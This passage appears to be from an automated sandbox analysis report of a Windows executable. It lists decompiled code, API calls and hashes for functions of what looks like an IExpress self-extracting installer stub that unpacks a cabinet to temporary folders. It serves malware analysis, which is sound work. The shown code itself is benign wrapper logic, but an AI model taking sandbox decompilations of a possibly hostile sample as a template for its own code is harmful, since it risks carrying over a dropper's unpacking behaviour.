                                                                                                                                                                                                                                                • Instruction ID: 80e7bf3ff4d892e1ddfcb8ccb540955f0f5ba9b08bf9842e75ffa49e5135070c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d78561aac4116e1ae68b99426f51e99db5b291ac7e18e6de077204d16dcaf14c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1571B5B1A0022CAFEB26DF60EC85FFB77ADEB48305F5440A9F405D2141EB349E858B65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 374 24fe0-2501a call 2468f FindResourceA LoadResource LockResource 377 25020-25027 374->377 378 25161-25163 374->378 379 25057-2505e call 24efd 377->379 380 25029-25051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 25060-25077 call 244b9 379->383 384 2507c-250b4 379->384 380->379 390 25107-2510e 383->390 388 250b6-250da 384->388 389 250e8-25104 call 244b9 384->389 401 25106 388->401 402 250dc 388->402 389->401 392 25110-25117 FreeResource 390->392 393 2511d-2511f 390->393 392->393 396 25121-25127 393->396 397 2513a-25141 393->397 396->397 398 25129-25135 call 244b9 396->398 399 25143-2514a 397->399 400 2515f 397->400 398->397 399->400 404 2514c-25159 SendMessageA 399->404 400->378 401->390 405 250e3-250e6 402->405 404->400 405->389 405->401
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00024FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x29144 = E0002468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x29140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x28584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x28584, 0x841), 5); // executed
				}
				_t10 = E00024EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00024CA0, E00024CC0, E00024980, E00024A50, E00024AD0, E00024B60, E00024BC0, 1, 0x29148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x29148; // 0x0
						_t24 =  *0x28584; // 0x0
						E000244B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x21140, 0, E00024CD0, 0, 0x29140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x28584; // 0x0
					E000244B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x29140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x29140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x291d8; // 0x0
						if(_t47 == 0) {
							E000244B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x28a38 & 0x00000001) == 0 && ( *0x29a34 & 0x00000001) == 0) {
						SendMessageA( *0x28584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                                0x00024fe0
                                                                                                                                                                                                                                                0x00024fe6
                                                                                                                                                                                                                                                0x00024ff9
                                                                                                                                                                                                                                                0x0002500d
                                                                                                                                                                                                                                                0x00025013
                                                                                                                                                                                                                                                0x0002501a
                                                                                                                                                                                                                                                0x00025163
                                                                                                                                                                                                                                                0x00025163
                                                                                                                                                                                                                                                0x00025020
                                                                                                                                                                                                                                                0x00025027
                                                                                                                                                                                                                                                0x00025037
                                                                                                                                                                                                                                                0x00025051
                                                                                                                                                                                                                                                0x00025051
                                                                                                                                                                                                                                                0x00025057
                                                                                                                                                                                                                                                0x0002505e
                                                                                                                                                                                                                                                0x000250a7
                                                                                                                                                                                                                                                0x000250ad
                                                                                                                                                                                                                                                0x000250b4
                                                                                                                                                                                                                                                0x000250e8
                                                                                                                                                                                                                                                0x000250e8
                                                                                                                                                                                                                                                0x000250ee
                                                                                                                                                                                                                                                0x000250ff
                                                                                                                                                                                                                                                0x00025104
                                                                                                                                                                                                                                                0x00025106
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025106
                                                                                                                                                                                                                                                0x000250cd
                                                                                                                                                                                                                                                0x000250d3
                                                                                                                                                                                                                                                0x000250da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000250dd
                                                                                                                                                                                                                                                0x000250e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025060
                                                                                                                                                                                                                                                0x00025060
                                                                                                                                                                                                                                                0x00025070
                                                                                                                                                                                                                                                0x00025075
                                                                                                                                                                                                                                                0x00025107
                                                                                                                                                                                                                                                0x00025107
                                                                                                                                                                                                                                                0x0002510e
                                                                                                                                                                                                                                                0x00025111
                                                                                                                                                                                                                                                0x00025117
                                                                                                                                                                                                                                                0x00025117
                                                                                                                                                                                                                                                0x0002511f
                                                                                                                                                                                                                                                0x00025121
                                                                                                                                                                                                                                                0x00025127
                                                                                                                                                                                                                                                0x00025135
                                                                                                                                                                                                                                                0x00025135
                                                                                                                                                                                                                                                0x00025127
                                                                                                                                                                                                                                                0x00025141
                                                                                                                                                                                                                                                0x00025159
                                                                                                                                                                                                                                                0x00025159
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002515f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00024FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00025006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0002500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00025030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00025037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0002504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00025051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00025111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00025159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 9fd41ff45dcf68608347f161c711508d974aa81d48a34fecc0cbac8853684836
                                                                                                                                                                                                                                                • Instruction ID: 1c3008868e72eedc61d5ba890cbe1824a8fc9aaaed5c743d2782b2092690458e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fd41ff45dcf68608347f161c711508d974aa81d48a34fecc0cbac8853684836
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C13103B0B40731BBF7305B66BCCAF67369CA709756F244024FA05A61E1DEBC8C528A65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000244B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 244b9-244f8 407 24679-2467b 406->407 408 244fe-24525 LoadStringA 406->408 411 2467c-2468c call 26ce0 407->411 409 24562-24568 408->409 410 24527-2452e call 2681f 408->410 413 2456b-24570 409->413 420 24530-2453d call 267c9 410->420 421 2453f 410->421 413->413 416 24572-2457c 413->416 418 245c9-245cb 416->418 419 2457e-24580 416->419 424 24607-24617 LocalAlloc 418->424 425 245cd-245cf 418->425 422 24583-24588 419->422 420->421 426 24544-24554 MessageBoxA 420->426 421->426 422->422 429 2458a-2458c 422->429 427 2455a-2455d 424->427 428 2461d-24628 call 21680 424->428 431 245d2-245d7 425->431 426->427 427->411 436 2462d-2463d MessageBeep call 2681f 428->436 433 2458f-24594 429->433 431->431 434 245d9-245ed LocalAlloc 431->434 433->433 437 24596-245ad LocalAlloc 433->437 434->427 435 245f3-24605 call 2171e 434->435 435->436 444 2464e 436->444 445 2463f-2464c call 267c9 436->445 437->427 440 245af-245c7 call 2171e 437->440 440->436 448 24653-24677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000244B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x28004; // 0xf4950d3e
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x28a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x29a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00021680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0002171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0002171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0002681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E000267C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0002681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E000267C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00026CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                                0x000244b9
                                                                                                                                                                                                                                                0x000244c4
                                                                                                                                                                                                                                                0x000244cb
                                                                                                                                                                                                                                                0x000244d8
                                                                                                                                                                                                                                                0x000244e4
                                                                                                                                                                                                                                                0x000244eb
                                                                                                                                                                                                                                                0x000244ee
                                                                                                                                                                                                                                                0x000244ef
                                                                                                                                                                                                                                                0x000244ef
                                                                                                                                                                                                                                                0x000244f1
                                                                                                                                                                                                                                                0x000244f7
                                                                                                                                                                                                                                                0x000244f8
                                                                                                                                                                                                                                                0x0002467b
                                                                                                                                                                                                                                                0x000244fe
                                                                                                                                                                                                                                                0x00024509
                                                                                                                                                                                                                                                0x00024518
                                                                                                                                                                                                                                                0x00024525
                                                                                                                                                                                                                                                0x00024562
                                                                                                                                                                                                                                                0x00024568
                                                                                                                                                                                                                                                0x00024568
                                                                                                                                                                                                                                                0x0002456b
                                                                                                                                                                                                                                                0x0002456b
                                                                                                                                                                                                                                                0x0002456d
                                                                                                                                                                                                                                                0x0002456e
                                                                                                                                                                                                                                                0x00024572
                                                                                                                                                                                                                                                0x00024578
                                                                                                                                                                                                                                                0x0002457c
                                                                                                                                                                                                                                                0x000245cb
                                                                                                                                                                                                                                                0x00024607
                                                                                                                                                                                                                                                0x00024607
                                                                                                                                                                                                                                                0x0002460d
                                                                                                                                                                                                                                                0x00024613
                                                                                                                                                                                                                                                0x00024617
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002461d
                                                                                                                                                                                                                                                0x00024623
                                                                                                                                                                                                                                                0x00024626
                                                                                                                                                                                                                                                0x00024628
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024628
                                                                                                                                                                                                                                                0x000245cd
                                                                                                                                                                                                                                                0x000245cd
                                                                                                                                                                                                                                                0x000245cf
                                                                                                                                                                                                                                                0x000245cf
                                                                                                                                                                                                                                                0x000245d2
                                                                                                                                                                                                                                                0x000245d2
                                                                                                                                                                                                                                                0x000245d4
                                                                                                                                                                                                                                                0x000245d5
                                                                                                                                                                                                                                                0x000245db
                                                                                                                                                                                                                                                0x000245de
                                                                                                                                                                                                                                                0x000245e3
                                                                                                                                                                                                                                                0x000245e9
                                                                                                                                                                                                                                                0x000245ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000245f3
                                                                                                                                                                                                                                                0x000245fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024602
                                                                                                                                                                                                                                                0x000245ed
                                                                                                                                                                                                                                                0x0002457e
                                                                                                                                                                                                                                                0x0002457e
                                                                                                                                                                                                                                                0x00024580
                                                                                                                                                                                                                                                0x00024580
                                                                                                                                                                                                                                                0x00024583
                                                                                                                                                                                                                                                0x00024583
                                                                                                                                                                                                                                                0x00024585
                                                                                                                                                                                                                                                0x00024586
                                                                                                                                                                                                                                                0x0002458a
                                                                                                                                                                                                                                                0x0002458c
                                                                                                                                                                                                                                                0x0002458f
                                                                                                                                                                                                                                                0x0002458f
                                                                                                                                                                                                                                                0x00024591
                                                                                                                                                                                                                                                0x00024592
                                                                                                                                                                                                                                                0x0002459b
                                                                                                                                                                                                                                                0x0002459e
                                                                                                                                                                                                                                                0x000245a3
                                                                                                                                                                                                                                                0x000245a9
                                                                                                                                                                                                                                                0x000245ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000245af
                                                                                                                                                                                                                                                0x000245af
                                                                                                                                                                                                                                                0x000245bf
                                                                                                                                                                                                                                                0x0002462d
                                                                                                                                                                                                                                                0x00024630
                                                                                                                                                                                                                                                0x0002463d
                                                                                                                                                                                                                                                0x0002464e
                                                                                                                                                                                                                                                0x0002464e
                                                                                                                                                                                                                                                0x0002463f
                                                                                                                                                                                                                                                0x00024640
                                                                                                                                                                                                                                                0x00024647
                                                                                                                                                                                                                                                0x0002464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002464c
                                                                                                                                                                                                                                                0x00024666
                                                                                                                                                                                                                                                0x0002466d
                                                                                                                                                                                                                                                0x0002466f
                                                                                                                                                                                                                                                0x00024675
                                                                                                                                                                                                                                                0x00024675
                                                                                                                                                                                                                                                0x000245ad
                                                                                                                                                                                                                                                0x00024527
                                                                                                                                                                                                                                                0x0002452e
                                                                                                                                                                                                                                                0x0002453f
                                                                                                                                                                                                                                                0x0002453f
                                                                                                                                                                                                                                                0x00024530
                                                                                                                                                                                                                                                0x00024531
                                                                                                                                                                                                                                                0x00024538
                                                                                                                                                                                                                                                0x0002453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002453d
                                                                                                                                                                                                                                                0x00024554
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x00024525
                                                                                                                                                                                                                                                0x0002468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000245A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000245E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0002460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00024630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00024666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0002466F
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0002686E
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: GetSystemMetrics.USER32(0000004A), ref: 000268A7
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000268CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,?,0000000C), ref: 000268F4
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegCloseKey.ADVAPI32(?), ref: 00026902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: 9489484ff24bfaa5327a83c522b74764bd34607409ed5fb4b2dc4c39334e6891
                                                                                                                                                                                                                                                • Instruction ID: 87c6d06accc3c9ba5b855b63c6467664e7c673334ec1ab3d7bb81caebc1fb7a0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9489484ff24bfaa5327a83c522b74764bd34607409ed5fb4b2dc4c39334e6891
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F512771A00235ABDB319F28EC48BEA7BB9EF46300F104195FD49A7242DB76DD0ACB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000253A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000253A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x28004; // 0xf4950d3e
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0002171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00021680(_t32, 0x104, _t20);
					E0002658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00026CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x28a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                                0x000253ac
                                                                                                                                                                                                                                                0x000253b3
                                                                                                                                                                                                                                                0x000253b9
                                                                                                                                                                                                                                                0x000253bb
                                                                                                                                                                                                                                                0x000253bd
                                                                                                                                                                                                                                                0x000253bf
                                                                                                                                                                                                                                                0x000253d1
                                                                                                                                                                                                                                                0x000253d6
                                                                                                                                                                                                                                                0x000253e0
                                                                                                                                                                                                                                                0x000253e2
                                                                                                                                                                                                                                                0x000253f5
                                                                                                                                                                                                                                                0x000253fb
                                                                                                                                                                                                                                                0x00025402
                                                                                                                                                                                                                                                0x0002540b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025413
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025415
                                                                                                                                                                                                                                                0x00025416
                                                                                                                                                                                                                                                0x00025427
                                                                                                                                                                                                                                                0x0002542a
                                                                                                                                                                                                                                                0x0002542b
                                                                                                                                                                                                                                                0x00025434
                                                                                                                                                                                                                                                0x00025434
                                                                                                                                                                                                                                                0x0002543a
                                                                                                                                                                                                                                                0x0002544c
                                                                                                                                                                                                                                                0x0002544c
                                                                                                                                                                                                                                                0x00025452
                                                                                                                                                                                                                                                0x0002545a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002545e
                                                                                                                                                                                                                                                0x0002545f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000253FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-4044985724
                                                                                                                                                                                                                                                • Opcode ID: 37a36d0e9700a4fa759630d87e8ba997358d8a1797f88db28b8970e93a6f2d87
                                                                                                                                                                                                                                                • Instruction ID: ec3e6736655b0144e2677314b3549bb294b08d30b393136aa32251dd60466703
